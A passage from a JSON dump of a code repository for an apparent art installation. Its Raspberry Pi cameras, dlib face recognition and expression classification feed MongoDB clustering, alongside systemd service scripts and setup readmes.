ping)\n echo \"$PREFIX up\"\n ;;\n exec)\n ssh $AT \"${@:2}\"\n ;;\n shutdown)\n ssh $AT \"/sbin/shutdown now\"\n ;;\n reboot)\n ssh $AT \"/sbin/shutdown --reboot now\"\n ;;\n pingtime)\n HOSTNAME=$(hostname)\n ssh $AT 'RTT=`ping -c4 -i0.2 '$HOSTNAME'.local | grep rtt` &&\\\n echo '$ID' $RTT'\n ;;\n status) \n ssh $AT 'TEMP=`vcgencmd measure_temp|cut -d= -f2` ;\\\n CPU_MEM=`ps --no-headers -eo cmd,%cpu,%mem --sort=-%cpu|head -n1|cut -d\" \" -f4-` ;\\\n ACTIVE=`systemctl is-active vibecheck` ;\\\n STATUS=`tail -n1 /var/log/vibecheck.log` ;\\\n ERR_STATUS=`tail -n1 /var/log/vibecheck.err.log` ;\\\n echo '$ID' $ACTIVE $TEMP $CPU_MEM $STATUS / $ERR_STATUS'\n ;;\n update)\n rsync -a \\\n --exclude=.DS_Store \\\n --exclude=__pycache__ \\\n --delete \\\n camera/ $AT:~/$ROOT_NAME/\n rsync -a config/$ID.json $AT:~/$ROOT_NAME/config.json\n ssh $AT 'sudo install -m 644 camera/libarducam_mipicamera.so /usr/lib/'\n echo $ID 'updated'\n ;;\n enable)\n ssh $AT \"systemctl enable vibecheck\"\n ;;\n disable)\n ssh $AT \"systemctl disable vibecheck\"\n ;;\n start)\n ssh $AT \"systemctl start vibecheck\"\n ;;\n stop)\n ssh $AT \"systemctl stop vibecheck\"\n ;;\n restart)\n ssh $AT \"systemctl restart vibecheck\"\n ;;\n download)\n if [ \"$#\" -ne 2 ]; then\n echo \"Example: ./$SCRIPT download /home/pi/reference/\"\n usage\n fi\n\n REMOTE_DIR=$2\n LOCAL_DIR=download/$ID\n mkdir -p $LOCAL_DIR\n rsync -a $AT:$REMOTE_DIR $LOCAL_DIR\n ;;\n esac\n} &\ndone\nwait\n" }, { "alpha_fraction": 0.5, "alphanum_fraction": 0.6364829540252686, "avg_line_length": 23.612903594970703, "blob_id": "eb96bd0868f2046adebdd9ee5b8f1e3444057ab0", "content_id": "4541af5b12d65a53b62ff198ffffeee1dc684dc9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 762, "license_type": "no_license", "max_line_length": 67, "num_lines": 31, "path": "/database/manual-data.py", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "from pymongo import MongoClient\nimport hdbscan\nimport json\nfrom bson.objectid import ObjectId\nfrom cluster import write_json\n\n# connect to mongo\nclient = MongoClient()\n\ntargets = {\n 'neutral':'4/1598376764645.jpg',\n 'happiness':'4/1598376764645.jpg',\n 'surprise':'4/1598376764645.jpg',\n 'anger':'4/1598376764645.jpg',\n 'disgust':'4/1598376764645.jpg',\n 'fear':'4/1598376764645.jpg',\n 'contempt':'4/1598376764645.jpg'\n}\n\nresults = {}\nfor key,fn in targets.items():\n data = client.vibecheck.raw.find({'photo_path':fn}).limit(1)[0]\n results[key] = {\n 'faceid': 0,\n 'average': 1.0,\n 'photo_path': fn,\n 'rect': data['faces'][0]['rect'],\n 'timestamp': data['_id'].generation_time\n }\n\nwrite_json(results)" }, { "alpha_fraction": 0.5849608182907104, "alphanum_fraction": 0.5909392833709717, "avg_line_length": 36.6349983215332, "blob_id": "f382b4adad8518ce8773df62013b452ab212e435", "content_id": "5550790e8694801d88efe12e5fd9dbde7ad4fb63", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7527, "license_type": "no_license", "max_line_length": 127, "num_lines": 200, "path": "/database/cluster.py", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "# if this script is running in a different timezone than the database,\n# then the weighting will be calculated incorrectly. the alternative is to\n# explicitly code the timezone of the database, but then the code has to be\n# manually updated when the installation moves time zones.\n\nfrom pymongo import MongoClient\nimport hdbscan\nimport json\nimport math\nfrom bson.objectid import ObjectId\nfrom collections import defaultdict\nimport datetime\n\nclass Encoder(json.JSONEncoder):\n def default(self, obj):\n if hasattr(obj, 'isoformat'):\n return obj.isoformat()\n elif isinstance(obj, ObjectId):\n return str(obj)\n else:\n return obj\n\n# connect to mongo\nclient = MongoClient()\n\ndef recognize():\n # load all data from \"raw\" collection \n raw_data = []\n descriptors = []\n for e in client.vibecheck.raw.find().limit(10000).sort('$natural',-1):\n raw_data.append(e)\n descriptors.extend([face['descriptor'] for face in e['faces']])\n\n print('total descriptors:', len(descriptors))\n\n if len(descriptors) == 0:\n print('skipping...')\n return []\n\n # cluster all the labels (can take 15 seconds)\n clusterer = hdbscan.HDBSCAN(\n min_cluster_size=2,\n cluster_selection_epsilon=0.4,\n core_dist_n_jobs=-1)\n labels = clusterer.fit_predict(descriptors)\n\n # combine labels with raw to create recognized_photos\n recognized_photos = []\n labels_iter = iter(labels)\n for e in raw_data:\n people = []\n for face in e['faces']:\n face_id = next(labels_iter)\n people.append({\n 'faceid': str(face_id),\n 'rect': face['rect'],\n 'expressions': face['expression']\n })\n recognized_photos.append({\n 'created': e['_id'].generation_time,\n 'camera': e['camera_id'],\n 'photoPath': e['photo_path'],\n 'people': people\n })\n\n # drop old recognized-photos and create a new one\n # client.vibecheck['recognized-photos'].drop()\n # client.vibecheck['recognized-photos'].insert_many(recognized_photos)\n\n return recognized_photos\n\n# 100 drops to weight of 0.2 over 7 days\n# 10 drops to weight of 0.2 over 1 day\ndef get_weight(dt, falloff=100):\n now = datetime.datetime.now().astimezone()\n secs = (now - dt).total_seconds() # positive\n hours = secs / (60 * 60)\n return math.exp(-hours / falloff)\n\n# main method, analyzes each entry in recognized-photos, builds db of people, updates mongo\ndef update_db(recognized_photos):\n all_expressions = []\n people_db = {}\n \n for document in recognized_photos:\n people = document['people']\n\n # to run this script in a different timezone than the database,\n # pass the database's timezone to astimezone(). e.g., UTC+2 (CEST):\n # db_timezone = datetime.timezone(datetime.timedelta(seconds=7200))\n weight = get_weight(document['created'].astimezone())\n\n # get sum of expressions in photo\n total_expressions = sum_photo_expressions(people)\n num_people = len(people) - 1\n \n # for each person, calculate total expression response\n for person in people:\n faceid = person['faceid']\n expressions = {}\n max_expressions = {}\n max_photos = {}\n max_rects = {}\n max_timestamp = {}\n for exp in person['expressions']:\n if len(all_expressions) == 0:\n all_expressions = person['expressions']\n\n val = total_expressions[exp] - person['expressions'][exp]\n val *= weight\n if exp in expressions:\n expressions[exp] += val\n if val > max_expressions[exp]:\n max_expressions[exp] = val\n max_photos[exp] = document['photoPath']\n max_rects[exp] = person['rect']\n max_timestamp[exp] = document['created']\n else:\n expressions[exp] = val\n max_expressions[exp] = val\n max_photos[exp] = document['photoPath']\n max_rects[exp] = person['rect']\n max_timestamp[exp] = document['created']\n\n # add or update entry in people_db\n update_person_entry(people_db, faceid, expressions, max_expressions,\n max_photos, max_rects, max_timestamp, num_people)\n\n # enter all into mongodb\n prep_and_update_mongo(people_db)\n return all_expressions\n\n# calculate sum expressions expressed in photo by all (helper method)\ndef sum_photo_expressions(people):\n total_expressions = defaultdict(float)\n for person in people:\n for exp, val in person['expressions'].items():\n total_expressions[exp] += val\n return dict(total_expressions)\n\n# add or update entry in people_db\ndef update_person_entry(people_db, faceid, expressions, max_expressions, max_photos, max_rects, max_timestamp, num_people):\n if faceid in people_db.keys():\n people_db[faceid]['num_people'] += num_people\n for exp in expressions:\n people_db[faceid]['expressions'][exp] += expressions[exp]\n if max_expressions[exp] > people_db[faceid]['max_expressions'][exp]:\n people_db[faceid]['max_expressions'][exp] = max_expressions[exp]\n people_db[faceid]['max_photos'][exp] = max_photos[exp]\n people_db[faceid]['max_rects'][exp] = max_rects[exp]\n people_db[faceid]['max_timestamp'][exp] = max_timestamp[exp]\n else:\n people_db[faceid] = {\n 'expressions': expressions,\n 'avg_expressions': {},\n 'max_expressions': max_expressions,\n 'max_photos': max_photos,\n 'max_rects': max_rects,\n 'max_timestamp': max_timestamp,\n 'num_people': num_people,\n 'faceid': faceid\n }\n\n# calculate average expressions and update mongo\ndef prep_and_update_mongo(people_db):\n docs = []\n for faceid in people_db:\n for exp in people_db[faceid]['expressions']:\n if people_db[faceid]['num_people'] == 0:\n print(f'faceid {faceid} exp {exp} num_people==0, skipping')\n continue\n people_db[faceid]['avg_expressions'][exp] = people_db[faceid]['expressions'][exp]/(people_db[faceid]['num_people'])\n docs.append(people_db[faceid])\n print('total people:', len(docs))\n\n client.vibecheck['people'].drop() # clear people collection, recreated regularly\n client.vibecheck['people'].insert_many(docs)\n\n# writes json file from mongo\ndef write_json(all_expressions):\n output = {}\n for exp in all_expressions:\n # exp = e['expression']\n max_exp = client.vibecheck['people'].find().sort('avg_expressions.'+exp, -1)[0]\n output[exp] = {\n 'faceid': max_exp['faceid'],\n 'average': max_exp['avg_expressions'][exp],\n 'photo_path': max_exp['max_photos'][exp],\n 'rect': max_exp['max_rects'][exp],\n 'timestamp': max_exp['max_timestamp'][exp]\n }\n with open('../app/static/data.json', 'w', encoding='utf-8') as f:\n json.dump(output, f, cls=Encoder, indent=2)\n\nif __name__ == '__main__':\n recognized_photos = recognize()\n if len(recognized_photos) == 0:\n exit()\n all_expressions = update_db(recognized_photos)\n write_json(all_expressions)\n" }, { "alpha_fraction": 0.5891169905662537, "alphanum_fraction": 0.6076897978782654, "avg_line_length": 35.117645263671875, "blob_id": "013e4d1433d5bfc7d406952509e75d34b7c22bc7", "content_id": "6196b11ce9fd191e6b2bed4e33a81e8b93f79b0c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3069, "license_type": "no_license", "max_line_length": 113, "num_lines": 85, "path": "/face/FaceAnalyzer.py", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "import dlib\nimport onnxruntime as ort\nimport cv2\nimport numpy as np\nfrom imutil import safe_crop\n\ndef rgb_to_gray(img):\n return img.mean(axis=-1)[...,np.newaxis].repeat(3,-1)\n\ndef preprocess(img):\n x = cv2.resize(img, (96,96))\n x = x.astype(np.float32)\n x -= 127.5\n x /= 127.5\n x = rgb_to_gray(x)\n return x[np.newaxis]\n\ndef softmax(x):\n x = np.exp(x)\n return x / x.sum()\n\ndef resize_rect(rect, upsample):\n tblr = (rect.top(), rect.bottom(), rect.left(), rect.right())\n return (np.asarray(tblr) * upsample).astype(int).tolist()\n\ndef resize_shape(shape, upsample):\n parts = [(e.x, e.y) for e in shape.parts()]\n return (np.asarray(parts) * upsample).astype(int).tolist()\n \ndef dlib_crop(img, rect):\n tblr = (rect.top(), rect.bottom(), rect.left(), rect.right())\n return safe_crop(img, tblr, fill=128)\n\ndef tblr_to_xywh(tblr):\n t,b,l,r = tblr\n return [\n (l + r) * 0.5,\n (t + b) * 0.5,\n (r - l),\n (b - t)\n ]\n\ndef xywh_to_tblr(xywh):\n x,y,w,h = xywh\n return [\n y - (h / 2),\n y + (h / 2),\n x - (w / 2),\n x + (w / 2)\n ]\n\nclass FaceAnalyzer:\n def __init__(self):\n self.face_detector = dlib.cnn_face_detection_model_v1('models/mmod_human_face_detector.dat')\n self.shape_predictor = dlib.shape_predictor('models/shape_predictor_5_face_landmarks.dat')\n self.face_recognizer = dlib.face_recognition_model_v1('models/dlib_face_recognition_resnet_model_v1.dat')\n self.expression_classifier = ort.InferenceSession('models/ferplus-mobilenetv2-0.830.onnx')\n with open('models/ferplus_classes.txt') as f:\n self.expression_classes = f.read().splitlines()\n\n def __call__(self, img, downsample=2):\n height, width = img.shape[:2]\n img_small = cv2.resize(img, (width//downsample, height//downsample))\n rects = self.face_detector(img_small, 0)\n rects = [e.rect for e in rects] # needed for cnn_face_detection_model_v1\n if len(rects) == 0:\n return []\n shapes = [self.shape_predictor(img_small, e) for e in rects] # 2ms\n descriptors = [self.face_recognizer.compute_face_descriptor(img_small, e) for e in shapes] # 20ms\n faces = np.vstack([preprocess(dlib_crop(img_small, e)) for e in rects])\n expressions = self.expression_classifier.run(None, {'mobilenetv2_1.00_96_input': faces})[0] # 4ms\n rects = [resize_rect(e, downsample) for e in rects]\n shapes = [resize_shape(e, downsample) for e in shapes]\n descriptors = [np.asarray(e).astype(float).tolist() for e in descriptors]\n expressions = [e.reshape(-1).astype(float) for e in expressions]\n expressions = [dict(zip(self.expression_classes, e)) for e in expressions]\n\n # switch from tblr to xywh\n rects = map(tblr_to_xywh, rects)\n\n faces = []\n keys = ('rect', 'shape', 'descriptor', 'expression')\n for values in zip(rects, shapes, descriptors, expressions):\n faces.append(dict(zip(keys, values)))\n return faces" }, { "alpha_fraction": 0.5565714240074158, "alphanum_fraction": 0.5805714130401611, "avg_line_length": 32.653846740722656, "blob_id": "c82cde70032195bd9f5d7ca3e9068ca480bfc87f", "content_id": "d5138c0b729143535cd3a28fe4152bcdd3b40b28", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1750, "license_type": "no_license", "max_line_length": 114, "num_lines": 52, "path": "/face/draw_shapes.py", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "import cv2\n\ndef draw_line(canvas, pt1, pt2, r=1, stroke=None):\n pt1 = tuple(map(int, pt1))\n pt2 = tuple(map(int, pt2))\n cv2.line(canvas, pt1, pt2, stroke, thickness=r, lineType=cv2.LINE_AA)\n\ndef draw_text(canvas, text, xy, color=0, scale=1, thickness=1, highlight=None,\n font_face=cv2.FONT_HERSHEY_SIMPLEX, antialias=False):\n l,t = xy\n (tw,th), baseline = cv2.getTextSize(text, font_face, scale, thickness)\n t += th + baseline - 1\n if highlight is not None:\n canvas[t-th-baseline-1:t,l:l+tw] = highlight\n cv2.putText(canvas, text, (l,t-baseline), font_face, scale, color, thickness, cv2.LINE_AA if antialias else 0)\n\n# for some reason a fill of 0 doesn't work, but 0.1 does work\ndef draw_circle(canvas, xy, r=1, stroke=None, fill=None, thickness=1, antialias=False):\n x,y = tuple(map(int, xy))\n line_type = cv2.LINE_AA if antialias else cv2.LINE_8\n if fill is not None:\n cv2.circle(canvas, (x,y), r, fill, -1, line_type)\n if stroke is not None:\n cv2.circle(canvas, (x,y), r, stroke, thickness, line_type)\n\ndef draw_rectangle(canvas, tblr, fill=None, stroke=None):\n t,b,l,r = tblr\n t = int(max(t,0))\n b = int(min(b,canvas.shape[0]-1))\n l = int(max(l,0))\n r = int(min(r,canvas.shape[1]-1))\n if fill is not None:\n canvas[t:b,l:r] = fill\n if stroke is not None:\n b -= 1\n r -= 1\n try:\n canvas[t:b,l] = stroke\n except IndexError:\n pass\n try:\n canvas[t:b,r] = stroke\n except IndexError:\n pass\n try:\n canvas[t,l:r] = stroke\n except IndexError:\n pass\n try:\n canvas[b,l:r+1] = stroke\n except IndexError:\n pass\n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 28.5, "blob_id": "bc4605a40adef744b20017fb3be0b137014f46c7", "content_id": "566b722e3521840aa2d6787a9c4711e5dbdc38bb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 471, "license_type": "no_license", "max_line_length": 63, "num_lines": 16, "path": "/database/download-used-images.py", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "import json\nfrom subprocess import call\nimport os\n\nwith open('../app/static/data.json') as f:\n data = json.load(f)\n\nimages = set(e['photo_path'] for e in data.values())\n\nfor image in images:\n input_fn = 'hek:~/Documents/vibe-check/app/images/' + image\n directory, fn = os.path.split(image)\n output_dir = os.path.join('../app/images', directory)\n os.makedirs(output_dir, exist_ok=True)\n print(input_fn, output_dir)\n call(['scp', input_fn, output_dir])" }, { "alpha_fraction": 0.7460317611694336, "alphanum_fraction": 0.761904776096344, "avg_line_length": 31, "blob_id": "067011d5c7736e0d354249158690484c19b42a90", "content_id": "ace988a32b22efd4fc6ea60c4593a13cf8929d1c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 63, "license_type": "no_license", "max_line_length": 51, "num_lines": 2, "path": "/face/run.sh", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "#!/bin/bash\n~/miniconda3/envs/vibe-check-dlib/bin/python app.py" }, { "alpha_fraction": 0.8212560415267944, "alphanum_fraction": 0.8212560415267944, "avg_line_length": 33.66666793823242, "blob_id": "e35babf33687e13b7b5fb4fbbb898cfb8afe7f56", "content_id": "7802476079205de36f452fbc715ec8fe503713b2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 207, "license_type": "no_license", "max_line_length": 70, "num_lines": 6, "path": "/automate/build-multibrowse.sh", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "git clone https://github.com/foxxyz/multibrowse.git multibrowse-source\ncd multibrowse-source\nsudo apt install -y lxrandr\npip install -v pyinstaller\npyinstaller --onefile multibrowse.py\nmv dist/multibrowse .." }, { "alpha_fraction": 0.7240095734596252, "alphanum_fraction": 0.7468758225440979, "avg_line_length": 33.20000076293945, "blob_id": "70118a6adf890ab191e7a07b8fe636ce62e8ce15", "content_id": "70602850c6fb241b7ff179440362c6410c5aba35", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3761, "license_type": "no_license", "max_line_length": 591, "num_lines": 110, "path": "/face/readme.md", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "# Face Analysis\n\nFirst download the models:\n\n```\nbash download-models.sh\n```\n\n## Setup environment\n\nThe `vibe-check-face` Anaconda environment is used for `cluster.py`, which runs regularly. `vibe-check-dlib` is needed for `vibe-check-face` service.\n\nWith Anaconda:\n\n```\nconda create -y --name vibe-check-face --no-default-packages python=3.7\nconda activate vibe-check-face\nconda install -y opencv numpy scipy\nconda install -y -c conda-forge dlib\npip install onnx onnxruntime easydict scikit-image sklearn flask pymongo hdbscan\n```\n\nOr from the yml file:\n\n```\nconda env create -f environment.yml\nconda activate vibe-check-app\npython app.py\n```\n\n## Install CUDA\n\nFirst install the NVIDIA Driver. This was originally tested under 440.100:\n\n```\nsudo apt install nvidia-driver-440\n```\n\nThen install CUDA (without the NVIDIA driver):\n\n```\ncd ~\nwget https://developer.nvidia.com/compute/cuda/10.1/Prod/local_installers/cuda_10.1.105_418.39_linux.run\nchmod +x cuda_10.1.105_418.39_linux.run\nsudo ./cuda_10.1.105_418.39_linux.run\n```\n\nAnd add the path to your `~/.profile`:\n\n```\nif [ -d \"/usr/local/cuda-10.1/bin/\" ]; then\n export PATH=/usr/local/cuda-10.1/bin${PATH:+:${PATH}}\n export LD_LIBRARY_PATH=/usr/local/cuda-10.1/lib64${LD_LIBRARY_PATH:+:${LD_LIBRARY_PATH}}\nfi\n```\n\nInstall cudnn with apt:\n\n```\nsudo apt-key adv --fetch-keys http://developer.download.nvidia.com/compute/cuda/repos/ubuntu1804/x86_64/7fa2af80.pub\nsudo bash -c 'echo \"deb http://developer.download.nvidia.com/compute/machine-learning/repos/ubuntu1804/x86_64 /\" > /etc/apt/sources.list.d/cuda_learn.list'\nsudo apt update\nsudo apt install libcudnn8 libcudnn8-dev\n```\n\n## Install dlib for GPU\n\n```\nsudo apt install -y libopenblas-dev liblapack-dev cmake\nconda create -y --name vibe-check-dlib --no-default-packages python=3.7\nconda activate vibe-check-dlib\ncd ~/Documents\ngit clone https://github.com/davisking/dlib.git\ncd dlib && mkdir build && cd build\ncmake ..\ncmake --build . --config Release\nsudo ldconfig\ncd ..\npython setup.py install --record files.txt\nconda install -y opencv\npip install flask onnxruntime pymongo\n```\n\n## Building the blocklist\n\nFirst, set `require_two_faces = False` in `AnalysisProcess.py`. Then delete any old images `find app/images -type f -delete` and restart the analyzer `sudo systemctl restart vibe-check-face`. And record ~100 images from each camera in the mostly empty exhibition space. Check how many images are available with `find app/images/0 | wc -l`.\n\nCheck multiple cameras simultaneously with:\n\n```\nfor id in `ls app/images/`; do echo $id `find app/images/$id | wc -l`; done\n```\n\nWhen enough images are available, `sudo systemctl stop vibe-check-face` then run `conda activate vibe-check-face && python build-blocklist.py`. This will recognize clusters of faces based on landmarks and face descriptors. When it is done, it will print analysis results, and output the file `blocklist.pkl`. This is loaded by `AnalysisProcess` to identify faces that need to be blocked. If it isn't recognizing some of the faces, lower `min_samples` and run again. It's ok if it's seeing some faces that aren't really there, as this will make the system more robust to pareidolic presences.\n\nWhen the script is finished, set `require_two_faces = True`, drop the face-related collections:\n\n```\nmongo vibecheck -eval 'db.getCollection(\"raw\").drop()'\nmongo vibecheck -eval 'db.getCollection(\"people\").drop()'\nmongo vibecheck -eval 'db.getCollection(\"recognized-photos\").drop()'\n```\n\nAnd clear the images `find app/images -type f -delete`, and restart the daemon `sudo systemctl restart vibe-check-face`.\n\nThe installation may appear broken until some people start walking through the space together.\n\n## Taking snapshots\n\nDelete an old snapshot to take a new snapshot." }, { "alpha_fraction": 0.7564259767532349, "alphanum_fraction": 0.7588739395141602, "avg_line_length": 31.719999313354492, "blob_id": "d592c0c9e64568b4e88170b57726a86f5b91c175", "content_id": "eef7cd2283c0c3f36f34134c0e970e685f2587e6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 817, "license_type": "no_license", "max_line_length": 150, "num_lines": 25, "path": "/automate/readme.md", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "# Automation\n\n## Load multiple windows in kiosk mode\n\nFirst build multibrowse: `bash build-multibrowse.sh` If you have a problem building multibrowse, make sure to restart the shell so `pip` is available.\n\nThen run `bash open-chrome.sh`.\n\nMake a shell script executable:\n\n```\ngsettings set org.gnome.nautilus.preferences executable-text-activation 'launch'\n```\n\n## Create services for background tasks\n\nRun `sudo bash setup-services.sh` to setup the `vibe-check-cluster`, `vibe-check-app`, `vibe-check-face` services.\n\nTo check the status, run `journalctl -feu vibe-check-cluster`.\n\nTo restart after making changes to code, run `sudo systemctl restart vibe-check-cluster`.\n\n## Take screenshots\n\nInstall `sudo apt install scrot` then `bash screenshot.sh` and look in `screenshots/` for `0-thumb.jpg` and `1-thumb.jpg`." }, { "alpha_fraction": 0.75, "alphanum_fraction": 0.7638888955116272, "avg_line_length": 35.25, "blob_id": "b22042adefe8506098373d4aa53d63582897957c", "content_id": "aeb5ce8a34267dc216dba852fe749ad34972d102", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 144, "license_type": "no_license", "max_line_length": 61, "num_lines": 4, "path": "/rpi/preview-exposure.sh", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "export IDS=$1\nexport EXPOSURE=$2\n./cameras exec \"cd camera && python capture-raw.py $EXPOSURE\"\n./cameras download /home/pi/reference/preview.jpg" }, { "alpha_fraction": 0.4844309687614441, "alphanum_fraction": 0.525489091873169, "avg_line_length": 30.842105865478516, "blob_id": "ab701201a6a5fd4bd7d02bcc4372b9cfa9cf1f34", "content_id": "90db964146eff42449ac026a2b1eefd34cbf8af9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3629, "license_type": "no_license", "max_line_length": 91, "num_lines": 114, "path": "/rpi/camera/RawProcessor.py", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "import cv2\nimport numpy as np\nfrom numba import njit\n\n@njit\ndef align_down(size, align):\n return (size & ~((align)-1))\n\n@njit\ndef align_up(size, align):\n return align_down(size + align - 1, align)\n\n@njit\ndef remove_padding_and_unpack_fast(data, width, height, bit_width, out):\n \"\"\"Remove padding and rearrange packed 16-bit values into unpacked.\"\"\"\n real_width = width // 8 * bit_width\n align_width = align_up(real_width, 32)\n jj = 0\n k = 0\n for y in range(height):\n j = jj\n for x in range(width//4):\n low = data[j+4]\n out[k] = (data[j] << 2) + ((low) & 0x3)\n out[k+1] = (data[j+1] << 2) + ((low >> 2) & 0x3)\n out[k+2] = (data[j+2] << 2) + ((low >> 4) & 0x3)\n out[k+3] = (data[j+3] << 2) + ((low >> 6) & 0x3)\n j += 5\n k += 4\n jj += align_width\n \ndef curves_to_lut(curves, in_range=1024, gamma=2.2):\n \"\"\"Build a LUT for a given set of curves, similar but not equal to Photoshop curves.\"\"\"\n lut = []\n x_values = np.arange(in_range).astype(float)\n for curve in curves:\n curve = np.asarray(curve).astype(float)\n ys, xs = curve.T / 256\n z = np.polyfit(xs, ys, len(xs)-1)\n f = np.poly1d(z)\n out = f(x_values / in_range)\n out = np.maximum(out, 0)\n out **= 1/gamma\n out *= 256\n out = np.minimum(out, 255)\n lut.append(out)\n return np.asarray(lut).astype(np.uint8)\n\n@njit\ndef apply_lut(img16, img8, lut):\n h,w = img16.shape[:2]\n n = h * w\n img16_flat = img16.reshape(-1,3)\n img8_flat = img8.reshape(-1,3)\n for i in range(n):\n for j in range(3):\n img8_flat[i][j] = lut[j][img16_flat[i][j]]\n \n@njit\ndef remove_padding_and_unpack_quarter_bgr_preview(data, width, height, bit_width, out):\n \"\"\"Same as above, but at quarter resolution unpacked directly to BGR.\"\"\"\n real_width = width // 8 * bit_width\n align_width = align_up(real_width, 32)\n skip_length = align_width * 4\n jj = 0\n k = 0\n n = width//4\n for y in range(height//4):\n j = jj\n for x in range(width//4):\n out[k+0] = data[j]\n out[k+1] = data[j+1]\n out[k+2] = data[j+align_width+1]\n j += 5\n k += 3\n jj += skip_length\n\n@njit\ndef zebra(img, width, height):\n i = 0\n n = width * height * 3\n for y in range(height):\n for x in range(width//3):\n if img[i] == 255:\n img[i] = 0\n if img[i+1] == 255:\n img[i+1] = 0\n if img[i+2] == 255:\n img[i+2] = 0 \n i += 9\n i += 3\n if i > n:\n break\n\nclass RawProcessor:\n \"\"\"For 16-bit output leave curves=None.\"\"\"\n def __init__(self, width, height, curves=None, mode='bgr'):\n self.w = width\n self.h = height\n self.img16_bayer = np.zeros((height*width), np.uint16)\n self.img16 = np.zeros((height,width,3), np.uint16)\n self.lut = None\n if curves is not None:\n self.lut = curves_to_lut(curves, in_range=1024)\n self.img8_lut = np.zeros((height,width,3), np.uint8)\n self.mode = cv2.COLOR_BAYER_RG2BGR if mode == 'bgr' else cv2.COLOR_BAYER_RG2RGB\n \n def __call__(self, data):\n remove_padding_and_unpack_fast(data, self.w, self.h, 10, self.img16_bayer)\n cv2.cvtColor(self.img16_bayer.reshape(self.h, self.w), self.mode, self.img16)\n if self.lut is None:\n return self.img16\n apply_lut(self.img16, self.img8_lut, self.lut)\n return self.img8_lut" }, { "alpha_fraction": 0.8003220558166504, "alphanum_fraction": 0.8003220558166504, "avg_line_length": 19.37704849243164, "blob_id": "8f956d96d606c8b75e1d816f8f3020d938c8ded4", "content_id": "42b701d2c4edbcf65a0e933df43b9f908cc780d5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1242, "license_type": "no_license", "max_line_length": 58, "num_lines": 61, "path": "/automate/setup-services.sh", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "USER=$SUDO_USER\nSERVICES_DIR=/etc/systemd/system/\n\n# vibe-check-cluster\ncat >$SERVICES_DIR/vibe-check-cluster.service <<EOL\n[Unit]\nDescription=Vibe Check Cluster\nAfter=mongodb.service\n\n[Service]\nWorkingDirectory=/home/$USER/Documents/vibe-check/database\nExecStart=/home/$USER/Documents/vibe-check/database/run.sh\nUser=$USER\nRestart=on-failure\n\n[Install]\nWantedBy=multi-user.target\nEOL\n\n# vibe-check-app\ncat >$SERVICES_DIR/vibe-check-app.service <<EOL\n[Unit]\nDescription=Vibe Check App\nAfter=mongodb.service\n\n[Service]\nWorkingDirectory=/home/$USER/Documents/vibe-check/app\nExecStart=/home/$USER/Documents/vibe-check/app/run.sh\nUser=$USER\nRestart=on-failure\n\n[Install]\nWantedBy=multi-user.target\nEOL\n\n# vibe-check-face\ncat >$SERVICES_DIR/vibe-check-face.service <<EOL\n[Unit]\nDescription=Vibe Check Face\nAfter=mongodb.service\n\n[Service]\nWorkingDirectory=/home/$USER/Documents/vibe-check/face\nExecStart=/home/$USER/Documents/vibe-check/face/run.sh\nUser=$USER\nRestart=on-failure\n\n[Install]\nWantedBy=multi-user.target\nEOL\n\nsystemctl daemon-reload\n\nsystemctl enable vibe-check-cluster\nsystemctl start vibe-check-cluster\n\nsystemctl enable vibe-check-app\nsystemctl start vibe-check-app\n\nsystemctl enable vibe-check-face\nsystemctl start vibe-check-face" }, { "alpha_fraction": 0.7219251394271851, "alphanum_fraction": 0.7219251394271851, "avg_line_length": 61.66666793823242, "blob_id": "df0356f38a10dc0b3422f4b1ba291cb25ab8ed67", "content_id": "40a0a91db0fc5550fdb417e11e714973bece4225", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 187, "license_type": "no_license", "max_line_length": 63, "num_lines": 3, "path": "/database/copy-remote.sh", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "# rsync --progress -rav hek:~/Documents/vibe-check/app/images .\nssh hek \"mongodump -d vibecheck --collection raw --archive\" | \\\n mongorestore --drop --nsInclude vibecheck.raw --archive" }, { "alpha_fraction": 0.6504707932472229, "alphanum_fraction": 0.6839924454689026, "avg_line_length": 27.255319595336914, "blob_id": "98714b35fbe7b9f9d1891bee284ab688c0e7f4ed", "content_id": "4a13176941db4482d470537021505ccd58ef8edd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2655, "license_type": "no_license", "max_line_length": 105, "num_lines": 94, "path": "/rpi/camera/capture-raw.py", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nfrom __future__ import print_function\nimport datetime\nimport sys\nimport json\n\ndef log(*args):\n print(str(datetime.datetime.now()), *args)\n sys.stdout.flush()\n\nfrom RawProcessor import RawProcessor, zebra, remove_padding_and_unpack_quarter_bgr_preview\nimport cv2\nimport numpy as np\nimport arducam_mipicamera as 